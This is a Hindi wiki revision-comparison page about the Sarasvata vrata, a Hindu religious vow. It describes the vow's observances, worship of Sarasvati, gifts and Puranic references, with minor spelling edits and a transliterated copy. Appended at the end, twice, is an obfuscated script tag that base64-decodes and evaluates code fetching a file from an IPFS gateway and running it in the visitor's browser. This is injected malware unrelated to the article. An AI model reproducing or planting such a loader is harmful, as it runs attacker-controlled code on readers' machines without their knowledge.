Difference between revisions of "सारस्वत व्रत"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - " {{लेख प्रगति |आधार=आधार1 |प्रारम्भिक= |माध्यमिक= |पूर्णता= |शोध= }}" to "")
m (Text replace - ")</ref" to "</ref")
 
(4 intermediate revisions by 3 users not shown)
Line 1: Line 1:
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
+
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
 
(1) यह संवत्सरव्रत है।<ref>[[मत्स्य पुराण]] (66|3-18); कृत्यकल्पतरु (व्रतखण्ड 435-436); हेमाद्रि (व्रतखण्ड 1, 553-555);</ref>  
 
(1) यह संवत्सरव्रत है।<ref>[[मत्स्य पुराण]] (66|3-18); कृत्यकल्पतरु (व्रतखण्ड 435-436); हेमाद्रि (व्रतखण्ड 1, 553-555);</ref>  
 
*[[शुक्ल पक्ष]] की उस तिथि पर जिसके अपने प्रिय देवता स्वामी हों या पंचमी पर, रविवार को या किसी शुभ दिन पर आरम्भ होता है।
 
*[[शुक्ल पक्ष]] की उस तिथि पर जिसके अपने प्रिय देवता स्वामी हों या पंचमी पर, रविवार को या किसी शुभ दिन पर आरम्भ होता है।
*दोनों सन्ध्याओं में एक भोजन करते समय मौन व्रत रखते है।
+
*दोनों सन्ध्याओं में एक भोजन करते समय मौन व्रत रखते हैं।
 
*[[सरस्वती]] पूजा तथा सुवासिनियों (सधवा नारियों का सम्मान) किया जाता है।<ref>[[पद्म पुराण]] (5|22|178-194); भविष्योत्तरपुराण (35|3-19);</ref>  
 
*[[सरस्वती]] पूजा तथा सुवासिनियों (सधवा नारियों का सम्मान) किया जाता है।<ref>[[पद्म पुराण]] (5|22|178-194); भविष्योत्तरपुराण (35|3-19);</ref>  
 
(2) एक वर्ष तक दोनों सन्ध्याओं में मौन साधन होता है।
 
(2) एक वर्ष तक दोनों सन्ध्याओं में मौन साधन होता है।
 
*वर्ष के अन्त में घृतपूर्ण घट, दो वस्त्रों, तिल एवं एक घंटे का दान दिया जाता है।
 
*वर्ष के अन्त में घृतपूर्ण घट, दो वस्त्रों, तिल एवं एक घंटे का दान दिया जाता है।
 
*[[सरस्वती लोक]] की प्राप्ति होती है।<ref>कृत्यकल्पतरु (व्रतखण्ड 441); हेमाद्रि (व्रतखण्ड 2, 862, [[पद्म पुराण]] से उद्धरण);</ref>  
 
*[[सरस्वती लोक]] की प्राप्ति होती है।<ref>कृत्यकल्पतरु (व्रतखण्ड 441); हेमाद्रि (व्रतखण्ड 2, 862, [[पद्म पुराण]] से उद्धरण);</ref>  
*यह मत्स्यपुराण<ref>मत्स्यपुराण (101|17-18)</ref> में वर्णित है।
+
*यह मत्स्यपुराण<ref>मत्स्यपुराण (101|17-18</ref> में वर्णित है।
 
(3) [[चैत्र]] [[शुक्ल पक्ष]] की [[पड़वा]] से प्रारम्भ कर सात दिनों तक चलता है।
 
(3) [[चैत्र]] [[शुक्ल पक्ष]] की [[पड़वा]] से प्रारम्भ कर सात दिनों तक चलता है।
*सुप्रभा, कांचनाक्षी, विशाला, मानसरोवर, त्रिनादा, सुवेणु, विमलोदका (ये सभी सरस्वती के या उसकी शाखाओं के नाम हैं) की पूजा की जाती है।
+
*सुप्रभा, कांचनाक्षी, [[विशाला]], मानसरोवर, त्रिनादा, सुवेणु, विमलोदका (ये सभी सरस्वती के या उसकी शाखाओं के नाम हैं) की पूजा की जाती है।
 
*प्रतिदिन दही से होम किया जाता है।
 
*प्रतिदिन दही से होम किया जाता है।
 
*दही से मिश्रित ब्रह्मभोज होता है।
 
*दही से मिश्रित ब्रह्मभोज होता है।
Line 16: Line 16:
 
*अन्त में अर्थात् [[फाल्गुन]] [[कृष्ण पक्ष]] में अन्तिम सात दिनों तक एक से आरम्भ कर क्रम से सात वस्त्रों का दान दिया जाता है।<ref>विष्णुधर्मोत्तरपुराण (3|164|1-7)।</ref>
 
*अन्त में अर्थात् [[फाल्गुन]] [[कृष्ण पक्ष]] में अन्तिम सात दिनों तक एक से आरम्भ कर क्रम से सात वस्त्रों का दान दिया जाता है।<ref>विष्णुधर्मोत्तरपुराण (3|164|1-7)।</ref>
  
 +
{{संदर्भ ग्रंथ}}
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>

Latest revision as of 13:02, 27 July 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.

(1) yah sanvatsaravrat hai.[1]

  • shukl paksh ki us tithi par jisake apane priy devata svami hoan ya panchami par, ravivar ko ya kisi shubh din par arambh hota hai.
  • donoan sandhyaoan mean ek bhojan karate samay maun vrat rakhate haian.
  • sarasvati pooja tatha suvasiniyoan (sadhava nariyoan ka samman) kiya jata hai.[2]

(2) ek varsh tak donoan sandhyaoan mean maun sadhan hota hai.

  • varsh ke ant mean ghritapoorn ghat, do vastroan, til evan ek ghante ka dan diya jata hai.
  • sarasvati lok ki prapti hoti hai.[3]
  • yah matsyapuran[4] mean varnit hai.

(3) chaitr shukl paksh ki p dava se prarambh kar sat dinoan tak chalata hai.

  • suprabha, kaanchanakshi, vishala, manasarovar, trinada, suvenu, vimalodaka (ye sabhi sarasvati ke ya usaki shakhaoan ke nam haian) ki pooja ki jati hai.
  • pratidin dahi se hom kiya jata hai.
  • dahi se mishrit brahmabhoj hota hai.
  • rat mean ghrit ke sath bhat khana hota hai.
  • yah vrat ek varsh tak chalata hai.
  • ant mean arthath phalgun krishna paksh mean antim sat dinoan tak ek se arambh kar kram se sat vastroan ka dan diya jata hai.[5]


tika tippani aur sandarbh

  1. matsy puran (66|3-18); krityakalpataru (vratakhand 435-436); hemadri (vratakhand 1, 553-555);
  2. padm puran (5|22|178-194); bhavishyottarapuran (35|3-19);
  3. krityakalpataru (vratakhand 441); hemadri (vratakhand 2, 862, padm puran se uddharan);
  4. matsyapuran (101|17-18
  5. vishnudharmottarapuran (3|164|1-7).

any sanbandhit liank

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>